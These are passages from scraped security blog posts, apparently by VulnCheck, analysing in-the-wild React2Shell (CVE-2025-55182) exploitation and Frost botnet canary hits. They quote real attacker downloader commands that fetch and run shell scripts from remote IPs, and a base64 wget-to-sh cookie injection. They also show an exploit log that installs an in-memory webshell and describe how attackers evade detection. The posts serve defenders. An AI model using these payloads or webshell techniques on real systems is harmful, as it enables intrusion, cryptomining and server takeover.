It uses ",[886,22965,22966],{},"echo"," piped through ",[886,22969,22970],{},"base64"," to obfuscate its payload.",[68,22973],{"src":22974,"alt":22975,"className":22976},"\u002Fblog\u002Freact2shell-canaries\u002F10-light.png","Image 10",[10876,21260],[68,22978],{"src":22979,"alt":22975,"className":22980},"\u002Fblog\u002Freact2shell-canaries\u002F10.png",[21265,21266],[18,22982,22983,22984,22987],{},"The payload resolves to ",[886,22985,22986],{},"(curl \\-k http:\u002F\u002F59.7.217.245:7070\u002Fc.sh||wget \\--no-check-certificate \\-q \\-O- http:\u002F\u002F59.7.217.245:7070\u002Fc.sh)\\>\\>\u002Fvar\u002Ftmp\u002F5.sh"," which produces a downloader script:",[68,22989],{"src":22990,"alt":22991,"className":22992},"\u002Fblog\u002Freact2shell-canaries\u002F11-light.png","Image 11",[10876,21260],[68,22994],{"src":22995,"alt":22991,"className":22996},"\u002Fblog\u002Freact2shell-canaries\u002F11.png",[21265,21266],[18,22998,22999,23000,23005],{},"All of this effort resolves into a ",[47,23001,23004],{"href":23002,"rel":23003},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fcc17c5a982a899986c292a41cdc0dfe75b7126b4833521a9b010722a382d11e8\u002Fcommunity",[51],"coinminer",", which the linked VirusTotal sample confirms.",[18,23007,23008],{},"Another active campaign in our data is the RondoDox botnet. For those unfamiliar, RondoDox rapidly incorporates new exploits but remains easy to detect because its hard-coded user agents give it away.",[68,23010],{"src":23011,"alt":23012,"className":23013},"\u002Fblog\u002Freact2shell-canaries\u002F12-light.png","Image 12",[10876,21260],[68,23015],{"src":23016,"alt":23012,"className":23017},"\u002Fblog\u002Freact2shell-canaries\u002F12.png",[21265,21266],[18,23019,23020],{},"We’ve seen many more attackers following this same pattern: download a payload to disk and run it. 
Our Initial Access team has focused on diskless exploitation and the nuances of React2Shell, but most attackers are succeeding with the simplest possible approach.",[1920,23022,1903],{"id":1902},[18,23024,23025],{},"Despite the flexibility of React2Shell, most attackers are sticking to familiar workflows: probe, download, execute. The nuance is in the probing, not the payloads. As new campaigns emerge, Canary Intelligence will continue to provide a view into how attackers are adapting the vulnerability to their tooling. A list of the IPs observed in our data is included below.",[61,23027,23029],{"id":23028},"observed-addresses-exploiting-cve-2025-55182","Observed Addresses Exploiting CVE-2025-55182",[307,23031,23032,23039],{},[310,23033,23034],{},[313,23035,23036],{},[316,23037,23038],{},"IP Addresses",[336,23040,23041,23045,23050,23055,23059,23063,23067,23072,23077,23082,23087,23092,23097,23102,23107,23112,23117,23122,23126,23131,23136,23141,23146,23151,23156,23161,23166,23171,23175,23180,23185,23190,23195,23200,23204,23209],{},[313,23042,23043],{},[341,23044,22766],{},[313,23046,23047],{},[341,23048,23049],{},"192.159.99.95",[313,23051,23052],{},[341,23053,23054],{},"149.50.96.133",[313,23056,23057],{},[341,23058,22862],{},[313,23060,23061],{},[341,23062,22792],{},[313,23064,23065],{},[341,23066,22926],{},[313,23068,23069],{},[341,23070,23071],{},"141.98.82.26",[313,23073,23074],{},[341,23075,23076],{},"95.214.52.169",[313,23078,23079],{},[341,23080,23081],{},"143.198.145.163",[313,23083,23084],{},[341,23085,23086],{},"89.117.50.231",[313,23088,23089],{},[341,23090,23091],{},"116.213.36.244",[313,23093,23094],{},[341,23095,23096],{},"203.145.44.183",[313,23098,23099],{},[341,23100,23101],{},"202.120.234.163",[313,23103,23104],{},[341,23105,23106],{},"202.120.234.124",[313,23108,23109],{},[341,23110,23111],{},"93.147.15.50",[313,23113,23114],{},[341,23115,23116],{},"49.248.192.204",[313,23118,23119],{},[341,23120,23121],{},"173.212.239.200",[313,23123,23124],{},[34
1,23125,22902],{},[313,23127,23128],{},[341,23129,23130],{},"104.200.73.215",[313,23132,23133],{},[341,23134,23135],{},"87.121.84.52",[313,23137,23138],{},[341,23139,23140],{},"52.53.242.157",[313,23142,23143],{},[341,23144,23145],{},"203.151.66.147",[313,23147,23148],{},[341,23149,23150],{},"181.215.193.5",[313,23152,23153],{},[341,23154,23155],{},"138.99.203.209",[313,23157,23158],{},[341,23159,23160],{},"98.172.84.11",[313,23162,23163],{},[341,23164,23165],{},"95.156.229.82",[313,23167,23168],{},[341,23169,23170],{},"78.108.180.87",[313,23172,23173],{},[341,23174,22818],{},[313,23176,23177],{},[341,23178,23179],{},"183.182.125.198",[313,23181,23182],{},[341,23183,23184],{},"179.43.134.114",[313,23186,23187],{},[341,23188,23189],{},"174.138.2.203",[313,23191,23192],{},[341,23193,23194],{},"162.19.222.42",[313,23196,23197],{},[341,23198,23199],{},"147.135.11.223",[313,23201,23202],{},[341,23203,22832],{},[313,23205,23206],{},[341,23207,23208],{},"1.233.104.29",[313,23210,23211],{},[341,23212,23213],{},"103.239.14.12",[1920,23215,202],{"id":201},[18,23217,10768,23218,1246,23221,10775,23224,10779,23227,1246,23232,1246,23237,59],{},[47,23219,283],{"href":281,"rel":23220},[51],[47,23222,216],{"href":1258,"rel":23223},[51],[47,23225,1251],{"href":1249,"rel":23226},[51],[47,23228,23230],{"href":10782,"rel":23229},[51],[1131,23231,10786],{},[47,23233,23235],{"href":10789,"rel":23234},[51],[1131,23236,10793],{},[47,23238,10798,23240],{"href":10796,"rel":23239},[51],[1131,23241,10801],{},[18,23243,1228,23244,1234,23247,1240,23250,1246,23253,1246,23256,1255,23259,1260],{},[47,23245,1233],{"href":10806,"rel":23246},[51],[47,23248,1239],{"href":1237,"rel":23249},[51],[47,23251,1245],{"href":1243,"rel":23252},[51],[47,23254,1251],{"href":1249,"rel":23255},[51],[47,23257,283],{"href":281,"rel":23258},[51],[47,23260,216],{"href":1258,"rel":23261},[51],{"title":219,"searchDepth":220,"depth":220,"links":23263},[23264,23265,23266,23267],{"id":22759,"depth":220,"text":22760},{"id":22
807,"depth":220,"text":22808},{"id":22916,"depth":220,"text":22917},{"id":23028,"depth":220,"text":23029},"We're already seeing active React2Shell exploitation, and defenders need to know what it looks like. VulnCheck Canary Intelligence has captured real attacker probes and payloads, offering early insight into how operators are weaponizing the vulnerability. The post includes detailed examples and a list of observed IPs to support immediate defensive action.",{"slug":23270},"react2shell-canaries","\u002Fblog\u002Freact2shell-canaries",{"title":21694,"description":23268},"blog\u002Freact2shell-canaries",[2941,242,1279,23275],"ip-intel","8-pZsv7P34F1O4W-bRlK1lLpiabgal2awIEcdfDRMlY",{"id":23278,"title":21687,"articles":23279,"authors":23304,"body":23306,"date":23681,"description":23682,"extension":234,"image":7,"link":7,"meta":23683,"navigation":237,"path":23685,"seo":23686,"series":7,"stem":23687,"subtype":7,"tags":23688,"__hash__":23689},"blog\u002Fblog\u002Freacting-to-shells-react2shell-variants-ecosystem.md",[23280,23284,23289,23292,23296,23300],{"title":23281,"source":11228,"link":23282,"date":23283},"Attacks pinned to critical React2Shell defect surge, surpass 50 confirmed victims","https:\u002F\u002Fcyberscoop.com\u002Freact2shell-attacks-surge-50-victims\u002F","2025-12-10",{"title":23285,"source":23286,"link":23287,"date":23288},"Attackers Worldwide are Zeroing In on React2Shell Vulnerability","Security Boulevard","https:\u002F\u002Fsecurityboulevard.com\u002F2025\u002F12\u002Fattackers-worldwide-are-zeroing-in-on-react2shell-vulnerability\u002F","2025-12-11",{"title":23290,"source":10841,"link":23291,"date":22039},"React issues new patches after security researchers flag additional flaws","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Freact-issues-new-patches-after-security-researchers-flag-additional-flaws\u002F807776\u002F",{"title":23293,"source":11228,"link":23294,"date":23295},"React2Shell fallout spreads to sensitive targets as public 
exploits hit all-time high","https:\u002F\u002Fcyberscoop.com\u002Freact2shell-vulnerability-fallout-spreads\u002F","2025-12-17",{"title":23297,"source":14382,"link":23298,"date":23299},"RondoDox Botnet Exploits Critical React2Shell Flaw to Hijack IoT Devices and Web Servers","https:\u002F\u002Fthehackernews.com\u002F2026\u002F01\u002Frondodox-botnet-exploits-critical.html","2026-01-01",{"title":23301,"source":11228,"link":23302,"date":23303},"Inside Vercel’s sleep-deprived race to contain React2Shell","https:\u002F\u002Fcyberscoop.com\u002Fvercel-cto-security-react2shell-vulnerability\u002F","2026-01-08",[23305],{"name":4410,"avatar":4411,"link":4412,"linkName":4413},{"type":15,"value":23307,"toc":23673},[23308,23322,23328,23331,23337,23341,23344,23347,23367,23370,23387,23400,23406,23412,23416,23419,23428,23431,23439,23446,23449,23495,23498,23501,23505,23508,23524,23527,23535,23556,23570,23577,23581,23584,23606,23613,23621,23623,23630,23632,23653],[18,23309,23310,23311,4641,23314,23317,23318,23321],{},"As ",[47,23312,22739],{"href":21675,"rel":23313},[51],[47,23315,10533],{"href":10531,"rel":23316},[51],") exploits continue to fly, our research team here at VulnCheck is analyzing attack patterns and artifacts across several different dimensions, from in-the-wild payloads and new public exploits to attacking IP volume and target geolocations. As of Monday, December 8, our ",[47,23319,283],{"href":281,"rel":23320},[51]," network is observing hundreds of exploit attempts. The chart below is from shortly before 10 AM ET, and our overall detection volume has already grown by 15-20% since then.",[18,23323,23324],{},[68,23325],{":width":10862,"alt":23326,"src":23327},"Canary detection volume","\u002Fblog\u002Fnextjs-cve-2025-55182\u002Freact2shell_canary_detection_volume.png",[18,23329,23330],{},"Public proof-of-concept (PoC) exploit code has also proliferated significantly, with valid (if derivative) PoCs now approaching triple digits based on our analysis. 
Notably, however, the public exploits our team has analyzed all target Next.js applications, not React directly. We expect this to change.",[18,23332,23333,23334,59],{},"While most of the community focus is understandably on opportunistic exploitation and commonplace adversary profiles (e.g., botnets, malicious Nuclei scanning), the real opportunities for attackers lie in the dynamic nature of exploitation and payload modification, much of which means reduced visibility and detection capabilities for defenders. This blog contains our Initial Access Intelligence team’s analysis of the React2Shell exploit ecosystem, potential and existing payload variations, and implications for detection and response. For background on this incident, read our emerging threat blog ",[47,23335,305],{"href":21675,"rel":23336},[51],[61,23338,23340],{"id":23339},"vulncheck-exploits","VulnCheck Exploits",[18,23342,23343],{},"As soon as the VulnCheck Initial Access Intelligence team evaluated the patch for CVE-2025-55182, it was clear that the vulnerability was going to have non-trivial downstream impacts. 
We immediately began attempting to find a path to execution, monitoring Git forges for new PoCs and relevant repositories, and writing detection signatures for specific variants.",[18,23345,23346],{},"From this, the team was able to deliver the following artifacts before the weekend hit (and before the spike in opportunistic exploitation attempts had been fully realized):",[22,23348,23349,23352,23355,23358,23361,23364],{},[25,23350,23351],{},"An initial weaponized exploit for the Next.js variant that delivers a reverse shell",[25,23353,23354],{},"An exploit utilizing the in-memory attack variant",[25,23356,23357],{},"An additional exploit containing the in-memory webshell variant",[25,23359,23360],{},"A network scanner for Next.js",[25,23362,23363],{},"Four network signatures for exploit variants based on real exploitation observations",[25,23365,23366],{},"Vulnerable Docker containers for testing (Next.js, React RSC, Expo, React Router)",[18,23368,23369],{},"The team has also added support for four additional exploit variants (for a total of seven), with accompanying signatures and PCAPs:",[22,23371,23372,23375,23378,23381],{},[25,23373,23374],{},"React Router: Targets experimental RSC functionality (not enabled by default) in the react-router library (shipped Dec. 9)",[25,23376,23377],{},"Expo: Targets the Expo framework with experimental support for RSC enabled. This version will enumerate the RSC endpoints and turn exploitation automatic (shipped Dec. 9)",[25,23379,23380],{},"React RSC: Targets the original React framework's RSC integration; this is only accessible via direct function calls, which provides a way to hunt for (and exploit) them in paths.",[25,23382,23383,23384,23386],{},"Waku - Targets the Waku framework. 
This variant uses a slightly different method for achieving RCE by avoiding the missing ",[886,23385,21563],{}," function while using a randomly generated endpoint (which is necessary for exploitation).",[18,23388,23389,23390,23395,23396,23399],{},"The team thought the in-memory exploit variant was particularly nifty and immediately prioritized one of these variants for our ",[47,23391,23394],{"href":23392,"rel":23393},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-12-05#cve-2025-55182-react-server-components-and-nextjs-deserialization-rce",[51],"Initial Access Intelligence release",". Naturally,  we wouldn’t be representing ourselves accurately if we didn’t throw some shells around. Below is a Next.js React2Shell payload that hijacks the HTTP prototype and injects the ",[886,23397,23398],{},"\u002Fvfearh"," path to the web server that executes arbitrary commands like an old-fashioned webshell in memory:",[1354,23401,23404],{"className":23402,"code":23403,"language":1359},[1357],"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2025-55182\u002Fwebshell$ .\u002Fbuild\u002Fcve-2025-55182_linux-arm64 -e -rhost 10.9.49.69 -rport 3000 -ell DEBUG\ntime=2025-12-05T14:08:09.776-05:00 level=STATUS msg=\"Starting target\" index=0 host=10.9.49.69 port=3000 ssl=false \"ssl auto\"=false\ntime=2025-12-05T14:08:09.776-05:00 level=STATUS msg=\"Generating webshell payload\"\ntime=2025-12-05T14:08:09.776-05:00 level=STATUS msg=\"Uploading webshell to target\"\ntime=2025-12-05T14:08:19.786-05:00 level=ERROR msg=\"HTTP request error: Post \\\"http:\u002F\u002F10.9.49.69:3000\u002F\\\": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\"\ntime=2025-12-05T14:08:19.786-05:00 level=SUCCESS msg=\"Webshell installed!\" location=http:\u002F\u002F10.9.49.69:3000\u002Fvfearh\ntime=2025-12-05T14:08:19.786-05:00 level=STATUS msg=\"Testing `id`\" 
testurl=\"http:\u002F\u002F10.9.49.69:3000\u002Fvfearh?z=id\"\ntime=2025-12-05T14:08:19.822-05:00 level=SUCCESS msg=\"uid=0(root) gid=0(root) groups=0(root)\\n\"\ntime=2025-12-05T14:08:19.822-05:00 level=SUCCESS msg=\"Exploit successfully completed\" exploited=true\nalbinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2025-55182\u002Fwebshell$ curl http:\u002F\u002F10.9.49.69:3000\u002Fvfearh?z=ls%20-l\ntotal 168\n-rw-r--r--   1 root root     77 Dec  4 23:41 jsconfig.json\n-rw-r--r--   1 root root     92 Dec  4 23:41 next.config.mjs\ndrwxr-xr-x 172 root root   4096 Dec  4 23:41 node_modules\n-rw-r--r--   1 root root  16384 Dec  4 23:41 notes.db\n-rw-r--r--   1 root root 123663 Dec  4 23:41 package-lock.json\n-rw-r--r--   1 root root    467 Dec  4 23:41 package.json\n-rw-r--r--   1 root root   6028 Dec  4 23:41 seed.sql\ndrwxr-xr-x   3 root root   4096 Dec  4 23:41 src\n\n",[886,23405,23403],{"__ignoreMap":219},[18,23407,23408,23409],{},"We've made the team's in-memory webshell publicly available here: ",[47,23410,22230],{"href":22230,"rel":23411},[51],[61,23413,23415],{"id":23414},"attack-path-observations","Attack Path Observations",[18,23417,23418],{},"One of the immediately interesting components of React2Shell CVE-2025-55182 vulnerability is the usage of custom React Flight Protocol (RFP) chunking logic and how it enables dynamic exploitation and payloads that are actively being used by attackers. VulnCheck’s Canary Intelligence network uses the signatures our Initial Access Intelligence team developed to identify new React2Shell variants being used directly on the internet; we’ve also been analyzing and categorizing public PoCs for our Exploit Database (XDB) that hand-curates exploit data from Git forges. 
The combination of these capabilities has allowed us to identify a few patterns across ongoing React2Shell exploitation and payloads being utilized by attackers.",[18,23420,23421,23422,23427],{},"This custom RFP protocol is used for React Server Components (previously React Server Actions) to allow execution of React components and logic on the server side. The reason this vulnerability stands out from similar (common) issues is that it doesn’t rely on a well-documented and tested format; instead, the vulnerability relies on a set of chunks that are interpreted by the implementation, along with a collection of model strings that allow for ",[47,23423,23426],{"href":23424,"rel":23425},"https:\u002F\u002Fgithub.com\u002Ffacebook\u002Freact\u002Fblob\u002Fv19.0.0\u002Fpackages\u002Freact-server\u002Fsrc\u002FReactFlightReplyServer.js#L908",[51],"dynamic evaluation of the chunks"," (that have side effects on the data being sent). This vulnerability stems from the usage of these chunks to override the server-side variable properties and gain control of the underlying JavaScript object.",[18,23429,23430],{},"While on its face this shares a lot of similarities to something like prototype pollution, the use of a custom protocol and a chunk-based structure allows an attacker a few huge advantages in the evasion and post-exploitation department:",[22,23432,23433,23436],{},[25,23434,23435],{},"Dynamic generation and obfuscation utilizing the model chunk logic",[25,23437,23438],{},"Direct interaction with the JavaScript runtime",[18,23440,23441,23442,23445],{},"Since the chunking logic of RFP can use its own internal references, it is possible to do complex recursive references in addition to utilizing the string model `",[886,23443,23444],{},"$`"," prefixed types often on JSON objects sent in the body. 
In reality, this means that most of the exploitation attempts are generating multiple chunks (often via the NextJS multipart HTTP handling in BusBoy) that then reference each other dynamically and utilize the internal RFP logic to modify behavior. This means that it is possible to do things such as recreate strings or array values that you might see in obfuscated JavaScript directly inside of the RFP requests, but also with the added layer of specialized and unique RFP types.",[18,23447,23448],{},"For example, here is a tiny subset of RFP model types that might be used by attackers to modify the flow of the requests:",[22,23450,23451,23457,23476,23482,23492],{},[25,23452,23453,23456],{},[886,23454,23455],{},"$Q"," - Directly references a chunk as a map type, allowing a payload to use a chunk as a map directly without declaring a map and allowing it to be used without a runtime declaration",[25,23458,23459,23462,23463,982,23465,23467,23468,23471,23472,23475],{},[886,23460,23461],{},"$K"," - Directly references other form types as chunks, meaning that the attackers targeting Next.js have the opportunity to not just use the single multipart filenames such as ",[886,23464,445],{},[886,23466,467],{}," that are common, but can reference other forms based on their integer and reference id. 
For example: ",[886,23469,23470],{},"$K1_test"," will allow access to the ",[886,23473,23474],{},"1_test"," form value.",[25,23477,23478,23481],{},[886,23479,23480],{},"$D"," - Date functions direct values",[25,23483,23484,23487,23488,23491],{},[886,23485,23486],{},"$u"," - Undefined without directly using the ",[886,23489,23490],{},"undefined"," keyword",[25,23493,23494],{},"And many many more",[18,23496,23497],{},"From an attacker’s perspective, the post-exploitation story for React2Shell is nearly perfect: a single request that is difficult to detect that results in direct manipulation of the active in-memory runtime that can allow complex manipulation of the back-end server state and access to arbitrary JavaScript runtime actions.",[18,23499,23500],{},"This has led to some interesting observations and variants seen in the wild.",[61,23502,23504],{"id":23503},"known-exploits-current-state","Known Exploits: Current State",[18,23506,23507],{},"The following roughly models the state of PoCs and exploits VulnCheck’s research team has analyzed based on our data corpus: Initial execution-based, in-memory, Unicode escaping in JSON, in-memory webshells, and classic droppers. It’s also likely that we haven’t yet seen the full range of exploit variants and pathways, and may not for some time.",[18,23509,23510,23511,23515,23516,982,23518,23520,23521,23523],{},"Initial execution-based exploits are the simplest and were the most common immediately following the publication of the first valid PoCs. These often had a similar structure to the ",[47,23512,23514],{"href":22088,"rel":23513},[51],"maple3142 PoC"," in that they simply call the NodeJS ",[886,23517,18710],{},[886,23519,1622],{}," modules to directly access ",[886,23522,21540],{}," or similar OS command execution payloads. 
These can be used to call reverse shells or reach simple OS command sinks that are extremely common in logic exploitation bugs.",[18,23525,23526],{},"This led to the next “staged” style payloads that are very common in simple PoCs and exploitation: droppers. Simply put, these variants just write the second-stage payload to disk and either execute it or drop a backdoor set of files to establish permanent access.",[18,23528,23529,23530,1554,23532,23534],{},"The next logical step: instead of directly calling system commands, we observed payloads starting to use the chunk that evaluates the JavaScript runtime to reside in memory, thus allowing adversaries to conduct activities entirely from the injected-into runtime. This is excellent for attackers because it means they can work without touching disk; it also allows for staging of next-step payloads even in environments without writable disks, which greatly decreases the likelihood of leaving artifacts behind. These types of payloads started to appear nearly immediately after the first real PoCs were published. This attack variant was one of the first variants our team created to bypass rules looking for simple ",[886,23531,1622],{},[886,23533,21540],{}," calls, immediately breaking a large subset of early emerging threat rules.",[18,23536,23537,23538,23543,23544,23547,23548,23551,23552,23555],{},"One of the next variants that we saw took advantage of the fact that the RFP chunks were almost uniformly distributed via ",[47,23539,23542],{"href":23540,"rel":23541},"https:\u002F\u002Fx.com\u002Fpyn3rd\u002Fstatus\u002F1996788502386909539",[51],"JSON objects inside of HTTP forms",". 
Since these are just JSON strings, as exploit developers we immediately recognized the value of being able to combine the chunk logic and JSON string handling that occurs prior to the parsing of the RFP logic, allowing pretty much any part of the RFP request to be escaped with Unicode ",[886,23545,23546],{},"\\uXXXX"," strings to opportunistically mask the specific fingerprints that had already become common. Suddenly, more detection rules and signatures could be bypassed by simply turning ",[886,23549,23550],{},"resolved_model"," into ",[886,23553,23554],{},"\\u0072\\u0065\\u0073\\u006f\\u006c\\u0076\\u0065\\u0064\\u005f\\u006d\\u006f\\u0064\\u0065\\u006c"," (and better yet, mixing and matching the Unicode escaping). This also forces network signatures to rely on pattern matching, which is more expensive and also generally a pain.",[18,23557,23558,23559,23564,23565,23569],{},"Attackers love a ",[47,23560,23563],{"href":23561,"rel":23562},"https:\u002F\u002Flangsec.org\u002Fpapers\u002FBratus.pdf",[51],"Weird Machine",", and being able to directly modify the running server state allowed for some interesting interactions. The most notable one that we identified was a variant that would ",[47,23566,23568],{"href":22224,"rel":23567},[51],"modify the NodeJS HTTP server prototype"," to allow an entirely in-memory webshell. Yes, you read that correctly. By modifying the prototype carefully, the currently running web server would expose an attacker-controlled path that could provide access to code execution on HTTP paths that were not exposed by the application, were not RFP requests, and would persist until the server is restarted and the Node HTTP prototype is reloaded. This is a nightmare for detection capabilities. 
Suddenly it was possible to send a single request that, if not caught by detections from the initial request, provided access to code execution on arbitrary attacker-controlled paths with low likelihood of detection.",[18,23571,23572,23573,23576],{},"For a creative attacker, the opportunities suddenly become limitless. We did some whiteboarding and came up with a few ideas for potential payloads: hooks directly in the TCP handling for Node, entirely in-memory bi-directional encrypted shells, self-modifying the running server to backdoor the server runtime, hiding an in-memory webshell that simulates attacking non-JavaScript behavior by making it look like common drive-by webshells (that will subtly respond to an attacker), injection into Git hooks, and the list goes on. For defenders, this means that “look for RFP requests” may no longer be an effective strategy, and instead will have to shift to “has anyone ",[1131,23574,23575],{},"ever"," sent an RFP request?”",[61,23578,23580],{"id":23579},"the-before-times-prior-to-real-pocs","The Before Times: Prior to Real PoCs",[18,23582,23583],{},"In the initial hours after CVE-2025-55182 was disclosed, there was a flood of wrong PoCs and repositories based on automated analysis or LLM-generated code. This serves as an interesting case study in how usage of these tools can lead to inaccurate information and a breakdown in detection quality that makes organizations less secure than they would be if they did not have false information.",[18,23585,23586,23587,23592,23593,23595,23596,23601,23602,23605],{},"The widely circulated ",[47,23588,23591],{"href":23589,"rel":23590},"https:\u002F\u002Fgithub.com\u002Fejpir\u002FCVE-2025-55182-research",[51],"ejpir\u002FCVE-2025-55182-research"," repository now states that it is a research project driven by Claude. 
Unfortunately, during the initial hours of the incident, this was one of the first public repositories to surface; at the time, not only did it ",[1131,23594,6881],{}," contain a warning about AI-generated code, it actually specified that “",[47,23597,23600],{"href":23598,"rel":23599},"https:\u002F\u002Fgithub.com\u002Fejpir\u002FCVE-2025-55182-research\u002Fcommit\u002Fe6f3f7f275a20c0ebc282b5cef37b833b458a16e#diff-b335630551682c19a781afebcf4d07bf978fb1f8ac04c6bf87428ed5106870f5",[51],"This is the **real working POC** using actual `react-server-dom-webpack@19.0.0` vulnerable code.","” In hindsight, the PoC and code are obviously wrong, but at the time, that repo was one of the only publicly available PoCs that looked like it ",[1131,23603,23604],{},"could"," be legitimate —  and it quickly became clear that people believed it was valid without any evidence that the code path reached the vulnerable components.",[18,23607,23608,23609,23612],{},"Many reputable organizations and security providers quickly jumped at the first available piece of information that looked like it could potentially be legit; security firms used it as a basis for signatures and fingerprints, researchers used it for copycat PoCs, and bad information was spread far and wide as many began (incorrectly) looking for ",[886,23610,23611],{},"vm#runInThisContext"," rather than looking for the RFP data chunks. VulnCheck researchers were actively working on this vulnerability at the time and quickly determined that the exploit and application was contrived to the point of not being real. 
It also did not match any of the patterns that were available in the fix.",[18,23614,23615,23616,23620],{},"Lachlan Davidson, the original vulnerability discoverer, eventually posted a warning on the ",[47,23617,22739],{"href":23618,"rel":23619},"https:\u002F\u002Freact2shell.com\u002F",[51]," website about invalid PoCs, particularly “anything that requires the developer to have explicitly exposed dangerous functionality to the client,” including PoCs using vm#runInThisContext, child_process#exec, and fs#writeFile.  Unfortunately, it’s hard to put the genie back in the bottle in today’s vulnerability data ecosystem, and as a result organizations may have thought they were protected based on AI-generated code that got picked up as true without any real vetting or validation.",[61,23622,1903],{"id":1902},[18,23624,23625,23626,23629],{},"React2Shell exploitation is ongoing and is likely to have a long tail. The VulnCheck team has noted several exploit variants already, and we anticipate that others will be released as researchers and adversaries explore pathways for RCE. Public PoCs are widely available but are so far largely targeting ",[47,23627,21191],{"href":21189,"rel":23628},[51]," applications, which are an important attack vector but shouldn’t be considered the only options. Organizations should consider variants and possible payload modifications when building their detection strategies, especially since the nature of the vulnerability gives adversaries access to a wide range of hard-to-detect post-exploitation options.",[61,23631,202],{"id":201},[18,23633,10768,23634,1246,23637,10775,23640,23643,23644,1246,23647,1255,23650,59],{},[47,23635,283],{"href":281,"rel":23636},[51],[47,23638,216],{"href":1258,"rel":23639},[51],[47,23641,1251],{"href":1249,"rel":23642},[51]," datasets. 
Additional insight into React2Shell exploitation, PoCs, and payloads can be found in the following blogs: ",[47,23645,21687],{"href":20134,"rel":23646},[51],[47,23648,21694],{"href":21690,"rel":23649},[51],[47,23651,21701],{"href":21697,"rel":23652},[51],[18,23654,1228,23655,1234,23658,1240,23661,1246,23664,1246,23667,1255,23670,1260],{},[47,23656,1233],{"href":10806,"rel":23657},[51],[47,23659,1239],{"href":1237,"rel":23660},[51],[47,23662,1245],{"href":1243,"rel":23663},[51],[47,23665,1251],{"href":1249,"rel":23666},[51],[47,23668,283],{"href":281,"rel":23669},[51],[47,23671,216],{"href":1258,"rel":23672},[51],{"title":219,"searchDepth":220,"depth":220,"links":23674},[23675,23676,23677,23678,23679,23680],{"id":23339,"depth":220,"text":23340},{"id":23414,"depth":220,"text":23415},{"id":23503,"depth":220,"text":23504},{"id":23579,"depth":220,"text":23580},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"2025-12-08","An analysis of React2Shell variants, public exploits, paths to RCE, and implications for detection and response",{"slug":23684},"reacting-to-shells-react2shell-variants-ecosystem","\u002Fblog\u002Freacting-to-shells-react2shell-variants-ecosystem",{"title":21687,"description":23682},"blog\u002Freacting-to-shells-react2shell-variants-ecosystem",[242,1280,1279],"-7tp04YdcrRlLRMTEPkIgujcHBb1M_qDp0nm-yocxjQ",{"id":23691,"title":20129,"articles":23692,"authors":23699,"body":23701,"date":25029,"description":25030,"extension":234,"image":7,"link":7,"meta":25031,"navigation":237,"path":25033,"seo":25034,"series":7,"stem":25035,"subtype":7,"tags":25036,"__hash__":25037},"blog\u002Fblog\u002Ffrost-checks-first.md",[23693,23696],{"title":23694,"source":14382,"link":23695,"date":23681},"Sneeit WordPress RCE Exploited in the Wild While ICTBroadcast Bug Fuels Frost Botnet 
Attacks","https:\u002F\u002Fthehackernews.com\u002F2025\u002F12\u002Fsneeit-wordpress-rce-exploited-in-wild.html",{"title":23697,"source":11228,"link":23698,"date":22718},"Exploitation of Sneeit WordPress RCE, ICTBroadcast flaw ongoing","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fexploitation-of-sneeit-wordpress-rce-ictbroadcast-flaw-ongoing",[23700],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":23702,"toc":25024},[23703,23706,23710,23719,24008,24011,24017,24032,24038,24045,24050,24073,24079,24305,24308,24328,24334,24337,24500,24515,24551,24557,24563,24662,24671,24787,24790,24812,24818,24834,24840,24855,24857,24869,24887,24907,24911,24914,24926,24929,24943,24947,25021],[263,23704],{":list":23705,"ico":266,"title":20},"[\"`frost`, a DDoS and spreader tool, uses strict match conditions and only attempts exploitation when a target's responses match expected output, which is why our Canary Intelligence was able to surface this activity.\",\"VulnCheck links most of the CVEs used by `frost` to long-running botnets. Nearly all appear in the VulnCheck KEV but only four appear in the CISA KEV. CVE-2025-1610 is the only new one that appears in neither list.\",\"Our IP Intelligence shows the exposed target population for these vulnerabilities is small, which limits the impact of this campaign. However, `frost` does not include the originally observed ICTBroadcast exploit (CVE-2025-2611), implying the operator has additional exploits beyond what appears in the binary.\"]",[1920,23707,23709],{"id":23708},"about-frost","About Frost",[18,23711,23712,23713,23718],{},"Starting on November 28, 2025 we began seeing new attacks on our ICTBroadcast ",[47,23714,23717],{"href":23715,"rel":23716},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-2611",[51],"CVE-2025-2611"," canaries. 
The raw canary data looks like:",[1354,23720,23722],{"className":22307,"code":23721,"language":22309,"meta":219,"style":219},"{\n  \"src_ip\": \"87.121.84.52\",\n  \"src_port\": 55590,\n  \"src_country\": \"NL\",\n  \"dst_country\": \"US\",\n  \"cve\": \"CVE-2025-2611\",\n  \"signature_id\": 12700629,\n  \"signature\": \"VULNCHECK ICTBroadcast CVE-2025-2611 Exploit Attempt\",\n  \"category\": \"Web Application Attack\",\n  \"severity\": 1,\n  \"payload\": \"R0VUIC9sb2dpbi5waHAgSFRUUC8xLjANCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBMaW51eCB4ODZfNjQ7IHJ2OjE0MC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzE0MC4wDQpDb29raWU6IEJST0FEQ0FTVD1gd2dldCR7SUZTfWh0dHA6Ly84Ny4xMjEuODQuNTIvbWlzYy5pY3Ricm9hZGNhc3Quc2gke0lGU30tTy18c2hgOyBpY3Ricm9hZGNhc3Q9YHdnZXQke0lGU31odHRwOi8vODcuMTIxLjg0LjUyL21pc2MuaWN0YnJvYWRjYXN0LnNoJHtJRlN9LU8tfHNoYA0KDQo=\",\n  \"http\": {\n    \"url\": \"\u002Flogin.php\",\n    \"http_user_agent\": \"Mozilla\u002F5.0 (X11; Linux x86_64; rv:140.0) Gecko\u002F20100101 Firefox\u002F140.0\",\n    \"protocol\": \"HTTP\u002F1.0\"\n  },\n  \"timestamp\": 